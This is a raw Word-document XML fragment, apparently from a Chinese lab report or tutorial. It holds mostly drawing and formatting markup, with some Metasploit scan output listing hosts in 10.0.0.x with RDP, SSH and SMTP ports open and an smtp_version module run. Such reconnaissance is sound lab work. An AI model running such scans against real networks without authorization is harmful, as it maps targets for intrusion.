7,1217,11053,1217,11058,1217,11063,1217,11069,1217,11075,1217,11081,1217,11087,1217,11093,1217,11099,1217,11105,1217,11112,1217,11118,1217,11125,1217,11131,1217,11138,1217,11145,1217,11152,1217,11160,1217,11167,1217,11175e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:557.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11157" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11157;width:82;height:322" coordorigin="1177,11157" coordsize="82,322" path="m1217,11175l1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11175,1217,11176,1217,11176,1217,11176,1217,11176,1217,11177,1217,11177,1217,11177,1217,11177,1217,11178,1217,11178,1217,11179,1217,11179,1217,11179,1217,11180,1217,11180,1217,11181,1217,11182,1217,11182,1217,11183,1217,11184,1217,11184,1217,11185,1217,11186,1217,11187,1217,11188,1217,11189,1217,11190,1217,11191,1217,11192,1217,11193,1217,11194,1217,11196,1217,11197,1217,11198,1217,11200,1217,11201,1217,11203,1217,11204,1217,11206,1217,11208,1217,11209,1217,11211,1217,11213,1217,11215,1217,11217,1217,11219,1217,11221,1217,11224,1217,11226,1217,11228,1217,11231,1217,11233,1217,11236,1217,11238,1217,11241,1217,11244,1217,11247,1217,11250,1217,11253,1217,11256,1217,11259,1217,11262,1217,11266,1217,11269,1217,11273,1217,11276,1217,11280,1217,11284,1217,11288,1217,11292,1217,11296,1217,11300,1217,11304,1217,11309,1217,11313,1217,11318,1217,11323,1217,11327,1217,11332,1217,11337,1217,11342,1217,11347,1217,11353,1217,11358,1217,11364,1217,11369,1217,11375,1217,11381,1217,11387,1217,11393,1217,11399,1217,11405,1217,11412,1217,11418,1217,11425,1217,11432,1217,11439,1217,11446,1217,11453,1217,11460,1217,11467,1217,11475e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:572.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11457" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11457;width:82;height:322" coordorigin="1177,11457" coordsize="82,322" path="m1217,11475l1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11475,1217,11476,1217,11476,1217,11476,1217,11476,1217,11476,1217,11476,1217,11477,1217,11477,1217,11477,1217,11478,1217,11478,1217,11478,1217,11479,1217,11479,1217,11480,1217,11480,1217,11481,1217,11481,1217,11482,1217,11482,1217,11483,1217,11484,1217,11485,1217,11485,1217,11486,1217,11487,1217,11488,1217,11489,1217,11490,1217,11491,1217,11492,1217,11493,1217,11494,1217,11496,1217,11497,1217,11498,1217,11500,1217,11501,1217,11503,1217,11504,1217,11506,1217,11508,1217,11510,1217,11511,1217,11513,1217,11515,1217,11517,1217,11519,1217,11521,1217,11524,1217,11526,1217,11528,1217,11531,1217,11533,1217,11536,1217,11539,1217,11541,1217,11544,1217,11547,1217,11550,1217,11553,1217,11556,1217,11559,1217,11563,1217,11566,1217,11569,1217,11573,1217,11577,1217,11580,1217,11584,1217,11588,1217,11592,1217,11596,1217,11600,1217,11605,1217,11609,1217,11613,1217,11618,1217,11623,1217,11627,1217,11632,1217,11637,1217,11642,1217,11648,1217,11653,1217,11658,1217,11664,1217,11669,1217,11675,1217,11681,1217,11687,1217,11693,1217,11699,1217,11705,1217,11712,1217,11718,1217,11725,1217,11732,1217,11739,1217,11746,1217,11753,1217,11760,1217,11767,1217,11775e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:587.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11757" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11757;width:82;height:322" coordorigin="1177,11757" coordsize="82,322" path="m1217,11775l1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11775,1217,11776,1217,11776,1217,11776,1217,11776,1217,11776,1217,11776,1217,11777,1217,11777,1217,11777,1217,11777,1217,11778,1217,11778,1217,11778,1217,11779,1217,11779,1217,11780,1217,11780,1217,11781,1217,11781,1217,11782,1217,11783,1217,11783,1217,11784,1217,11785,1217,11785,1217,11786,1217,11787,1217,11788,1217,11789,1217,11790,1217,11791,1217,11792,1217,11793,1217,11795,1217,11796,1217,11797,1217,11799,1217,11800,1217,11801,1217,11803,1217,11805,1217,11806,1217,11808,1217,11810,1217,11812,1217,11813,1217,11815,1217,11817,1217,11819,1217,11822,1217,11824,1217,11826,1217,11828,1217,11831,1217,11833,1217,11836,1217,11839,1217,11841,1217,11844,1217,11847,1217,11850,1217,11853,1217,11856,1217,11859,1217,11863,1217,11866,1217,11870,1217,11873,1217,11877,1217,11880,1217,11884,1217,11888,1217,11892,1217,11896,1217,11900,1217,11905,1217,11909,1217,11914,1217,11918,1217,11923,1217,11928,1217,11933,1217,11937,1217,11943,1217,11948,1217,11953,1217,11958,1217,11964,1217,11970,1217,11975,1217,11981,1217,11987,1217,11993,1217,11999,1217,12006,1217,12012,1217,12019,1217,12025,1217,12032,1217,12039,1217,12046,1217,12053,1217,12060,1217,12068,1217,12075e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:602.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,12057" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:12057;width:82;height:322" coordorigin="1177,12057" coordsize="82,322" path="m1217,12075l1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12075,1217,12076,1217,12076,1217,12076,1217,12076,1217,12076,1217,12076,1217,12077,1217,12077,1217,12077,1217,12077,1217,12078,1217,12078,1217,12078,1217,12079,1217,12079,1217,12079,1217,12080,1217,12080,1217,12081,1217,12081,1217,12082,1217,12083,1217,12083,1217,12084,1217,12085,1217,12086,1217,12086,1217,12087,1217,12088,1217,12089,1217,12090,1217,12091,1217,12092,1217,12094,1217,12095,1217,12096,1217,12097,1217,12099,1217,12100,1217,12102,1217,12103,1217,12105,1217,12106,1217,12108,1217,12110,1217,12112,1217,12114,1217,12116,1217,12118,1217,12120,1217,12122,1217,12124,1217,12126,1217,12129,1217,12131,1217,12134,1217,12136,1217,12139,1217,12142,1217,12144,1217,12147,1217,12150,1217,12153,1217,12156,1217,12160,1217,12163,1217,12166,1217,12170,1217,12173,1217,12177,1217,12181,1217,12184,1217,12188,1217,12192,1217,12196,1217,12201,1217,12205,1217,12209,1217,12214,1217,12218,1217,12223,1217,12228,1217,12233,1217,12238,1217,12243,1217,12248,1217,12253,1217,12259,1217,12264,1217,12270,1217,12275,1217,12281,1217,12287,1217,12293,1217,12299,1217,12306,1217,12312,1217,12319,1217,12325,1217,12332,1217,12339,1217,12346,1217,12353,1217,12360,1217,12368,1217,12375e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:617.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,12357" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:12357;width:82;height:322" coordorigin="1177,12357" coordsize="82,322" path="m1217,12375l1217,12375,1217,12375,1217,12375,1217,12375,1217,12375,1217,12375,1217,12375,1217,12375,1217,12375,1217,12375,1217,12375,1217,12375,1217,12376,1217,12376,1217,12376,1217,12376,1217,12376,1217,12376,1217,12376,1217,12376,1217,12377,1217,12377,1217,12377,1217,12377,1217,12378,1217,12378,1217,12378,1217,12379,1217,12379,1217,12380,1217,12380,1217,12381,1217,12381,1217,12382,1217,12382,1217,12383,1217,12384,1217,12384,1217,12385,1217,12386,1217,12387,1217,12388,1217,12388,1217,12389,1217,12390,1217,12391,1217,12393,1217,12394,1217,12395,1217,12396,1217,12397,1217,12399,1217,12400,1217,12402,1217,12403,1217,12405,1217,12407,1217,12408,1217,12410,1217,12412,1217,12414,1217,12416,1217,12418,1217,12420,1217,12422,1217,12424,1217,12426,1217,12429,1217,12431,1217,12434,1217,12436,1217,12439,1217,12442,1217,12445,1217,12447,1217,12450,1217,12453,1217,12457,1217,12460,1217,12463,1217,12466,1217,12470,1217,12473,1217,12477,1217,12481,1217,12485,1217,12489,1217,12493,1217,12497,1217,12501,1217,12505,1217,12509,1217,12514,1217,12518,1217,12523,1217,12528,1217,12533,1217,12538,1217,12543,1217,12548,1217,12553,1217,12559,1217,12564,1217,12570,1217,12576,1217,12581,1217,12587,1217,12593,1217,12600,1217,12606,1217,12612,1217,12619,1217,12625,1217,12632,1217,12639,1217,12646,1217,12653,1217,12660,1217,12668,1217,12675e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:632.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,12657" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:12657;width:82;height:322" coordorigin="1177,12657" coordsize="82,322" path="m1217,12675l1217,12675,1217,12675,1217,12675,1217,12675,1217,12675,1217,12675,1217,12675,1217,12675,1217,12675,1217,12676,1217,12676,1217,12676,1217,12676,1217,12676,1217,12676,1217,12676,1217,12676,1217,12676,1217,12676,1217,12677,1217,12677,1217,12677,1217,12677,1217,12678,1217,12678,1217,12678,1217,12679,1217,12679,1217,12679,1217,12680,1217,12680,1217,12681,1217,12681,1217,12682,1217,12682,1217,12683,1217,12684,1217,12684,1217,12685,1217,12686,1217,12687,1217,12688,1217,12689,1217,12690,1217,12691,1217,12692,1217,12693,1217,12694,1217,12695,1217,12696,1217,12698,1217,12699,1217,12700,1217,12702,1217,12703,1217,12705,1217,12707,1217,12708,1217,12710,1217,12712,1217,12714,1217,12716,1217,12718,1217,12720,1217,12722,1217,12724,1217,12727,1217,12729,1217,12731,1217,12734,1217,12736,1217,12739,1217,12742,1217,12745,1217,12748,1217,12751,1217,12754,1217,12757,1217,12760,1217,12763,1217,12767,1217,12770,1217,12774,1217,12777,1217,12781,1217,12785,1217,12789,1217,12793,1217,12797,1217,12801,1217,12805,1217,12810,1217,12814,1217,12819,1217,12823,1217,12828,1217,12833,1217,12838,1217,12843,1217,12848,1217,12853,1217,12859,1217,12864,1217,12870,1217,12876,1217,12882,1217,12888,1217,12894,1217,12900,1217,12906,1217,12912,1217,12919,1217,12926,1217,12932,1217,12939,1217,12946,1217,12953,1217,12961,1217,12968,1217,12976e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:647.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,12957" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:12957;width:82;height:322" coordorigin="1177,12957" coordsize="82,322" path="m1217,12976l1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12976,1217,12977,1217,12977,1217,12977,1217,12977,1217,12977,1217,12978,1217,12978,1217,12978,1217,12979,1217,12979,1217,12979,1217,12980,1217,12980,1217,12981,1217,12981,1217,12982,1217,12983,1217,12983,1217,12984,1217,12985,1217,12985,1217,12986,1217,12987,1217,12988,1217,12989,1217,12990,1217,12991,1217,12992,1217,12993,1217,12994,1217,12995,1217,12996,1217,12998,1217,12999,1217,13001,1217,13002,1217,13004,1217,13005,1217,13007,1217,13009,1217,13010,1217,13012,1217,13014,1217,13016,1217,13018,1217,13020,1217,13022,1217,13024,1217,13027,1217,13029,1217,13032,1217,13034,1217,13037,1217,13039,1217,13042,1217,13045,1217,13048,1217,13051,1217,13054,1217,13057,1217,13060,1217,13063,1217,13067,1217,13070,1217,13074,1217,13077,1217,13081,1217,13085,1217,13089,1217,13093,1217,13097,1217,13101,1217,13105,1217,13110,1217,13114,1217,13119,1217,13123,1217,13128,1217,13133,1217,13138,1217,13143,1217,13148,1217,13154,1217,13159,1217,13165,1217,13170,1217,13176,1217,13182,1217,13188,1217,13194,1217,13200,1217,13206,1217,13213,1217,13219,1217,13226,1217,13233,1217,13239,1217,13246,1217,13254,1217,13261,1217,13268,1217,13276e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:662.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13257" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13257;width:82;height:322" coordorigin="1177,13257" coordsize="82,322" path="m1217,13276l1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13276,1217,13277,1217,13277,1217,13277,1217,13277,1217,13277,1217,13278,1217,13278,1217,13278,1217,13278,1217,13279,1217,13279,1217,13280,1217,13280,1217,13280,1217,13281,1217,13282,1217,13282,1217,13283,1217,13283,1217,13284,1217,13285,1217,13285,1217,13286,1217,13287,1217,13288,1217,13289,1217,13290,1217,13291,1217,13292,1217,13293,1217,13294,1217,13295,1217,13297,1217,13298,1217,13299,1217,13301,1217,13302,1217,13304,1217,13305,1217,13307,1217,13309,1217,13310,1217,13312,1217,13314,1217,13316,1217,13318,1217,13320,1217,13322,1217,13325,1217,13327,1217,13329,1217,13332,1217,13334,1217,13337,1217,13339,1217,13342,1217,13345,1217,13348,1217,13351,1217,13354,1217,13357,1217,13360,1217,13364,1217,13367,1217,13370,1217,13374,1217,13378,1217,13381,1217,13385,1217,13389,1217,13393,1217,13397,1217,13401,1217,13406,1217,13410,1217,13414,1217,13419,1217,13424,1217,13428,1217,13433,1217,13438,1217,13443,1217,13449,1217,13454,1217,13459,1217,13465,1217,13470,1217,13476,1217,13482,1217,13488,1217,13494,1217,13500,1217,13506,1217,13513,1217,13519,1217,13526,1217,13533,1217,13540,1217,13547,1217,13554,1217,13561,1217,13568,1217,13576e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:677.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13557" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13557;width:82;height:322" coordorigin="1177,13557" coordsize="82,322" path="m1217,13576l1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13576,1217,13577,1217,13577,1217,13577,1217,13577,1217,13577,1217,13577,1217,13578,1217,13578,1217,13578,1217,13579,1217,13579,1217,13579,1217,13580,1217,13580,1217,13581,1217,13581,1217,13582,1217,13582,1217,13583,1217,13583,1217,13584,1217,13585,1217,13586,1217,13586,1217,13587,1217,13588,1217,13589,1217,13590,1217,13591,1217,13592,1217,13593,1217,13594,1217,13596,1217,13597,1217,13598,1217,13599,1217,13601,1217,13602,1217,13604,1217,13605,1217,13607,1217,13609,1217,13611,1217,13612,1217,13614,1217,13616,1217,13618,1217,13620,1217,13623,1217,13625,1217,13627,1217,13629,1217,13632,1217,13634,1217,13637,1217,13640,1217,13642,1217,13645,1217,13648,1217,13651,1217,13654,1217,13657,1217,13660,1217,13664,1217,13667,1217,13670,1217,13674,1217,13678,1217,13681,1217,13685,1217,13689,1217,13693,1217,13697,1217,13701,1217,13706,1217,13710,1217,13715,1217,13719,1217,13724,1217,13729,1217,13733,1217,13738,1217,13743,1217,13749,1217,13754,1217,13759,1217,13765,1217,13770,1217,13776,1217,13782,1217,13788,1217,13794,1217,13800,1217,13806,1217,13813,1217,13819,1217,13826,1217,13833,1217,13840,1217,13847,1217,13854,1217,13861,1217,13868,1217,13876e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:692.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13857" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13857;width:82;height:322" coordorigin="1177,13857" coordsize="82,322" path="m1217,13876l1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13876,1217,13877,1217,13877,1217,13877,1217,13877,1217,13877,1217,13877,1217,13878,1217,13878,1217,13878,1217,13878,1217,13879,1217,13879,1217,13879,1217,13880,1217,13880,1217,13881,1217,13881,1217,13882,1217,13882,1217,13883,1217,13884,1217,13884,1217,13885,1217,13886,1217,13887,1217,13887,1217,13888,1217,13889,1217,13890,1217,13891,1217,13892,1217,13893,1217,13894,1217,13896,1217,13897,1217,13898,1217,13900,1217,13901,1217,13903,1217,13904,1217,13906,1217,13907,1217,13909,1217,13911,1217,13913,1217,13914,1217,13916,1217,13918,1217,13921,1217,13923,1217,13925,1217,13927,1217,13930,1217,13932,1217,13934,1217,13937,1217,13940,1217,13942,1217,13945,1217,13948,1217,13951,1217,13954,1217,13957,1217,13961,1217,13964,1217,13967,1217,13971,1217,13974,1217,13978,1217,13982,1217,13985,1217,13989,1217,13993,1217,13997,1217,14002,1217,14006,1217,14010,1217,14015,1217,14019,1217,14024,1217,14029,1217,14034,1217,14039,1217,14044,1217,14049,1217,14054,1217,14059,1217,14065,1217,14071,1217,14076,1217,14082,1217,14088,1217,14094,1217,14100,1217,14107,1217,14113,1217,14120,1217,14126,1217,14133,1217,14140,1217,14147,1217,14154,1217,14161,1217,14169,1217,14176e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:339.600pt;height:177.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId26" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:430.800pt;width:302.399pt;height:69.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId2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1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16"/>
        </w:tabs>
        <w:spacing w:before="0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6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17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.2: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8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10.0.0.2:3389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1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6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17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.3: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8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10.0.0.3:3389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1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6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17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.5: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8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10.0.0.5:3389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1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6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17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.7: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8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10.0.0.7:3389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1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6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17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.9: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8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10.0.0.9:3389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10.0.0.12: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10.0.0.12:3389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10.0.0.13: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10.0.0.13:3389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10.0.0.14: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10.0.0.14:3389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10.0.0.26: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10.0.0.26:3389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10.0.0.28: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10.0.0.28:3389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10.0.0.32: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10.0.0.32:3389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IP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1-255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open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22,25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="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（部分）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1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16"/>
        </w:tabs>
        <w:spacing w:before="0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6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17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.3: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6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10.0.0.3:25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-27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6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7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1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6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17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.5: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6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10.0.0.5:25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-27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6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7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10.0.0.14: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10.0.0.14:25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10.0.0.15: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10.0.0.15:22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10.0.0.16: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10.0.0.16:22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10.0.0.17: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10.0.0.17:22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10.0.0.20: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10.0.0.20:22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10.0.0.21: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10.0.0.21:22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10.0.0.31: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10.0.0.31:22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10.0.0.38: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10.0.0.38:22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10.0.0.40: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10.0.0.40:22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47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1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.99: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10.0.0.99:22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23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22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53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2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0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.251: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8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10.0.0.251:22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536"/>
        </w:tabs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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[+]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.0.254:</w:t>
      </w:r>
      <w:r>
        <w:tab/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8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10.0.0.254:22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TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-1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OPEN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IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2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1-255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smtp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for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2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version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2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（部分）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282.600pt;height:129.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId28" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:406.800pt;width:467.400pt;height:192.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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auxiliary(smtp_version)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run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536"/>
        </w:tabs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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[+]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.0.3:25</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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10.0.0.3:25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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SMTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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220</w:t>
      </w:r>
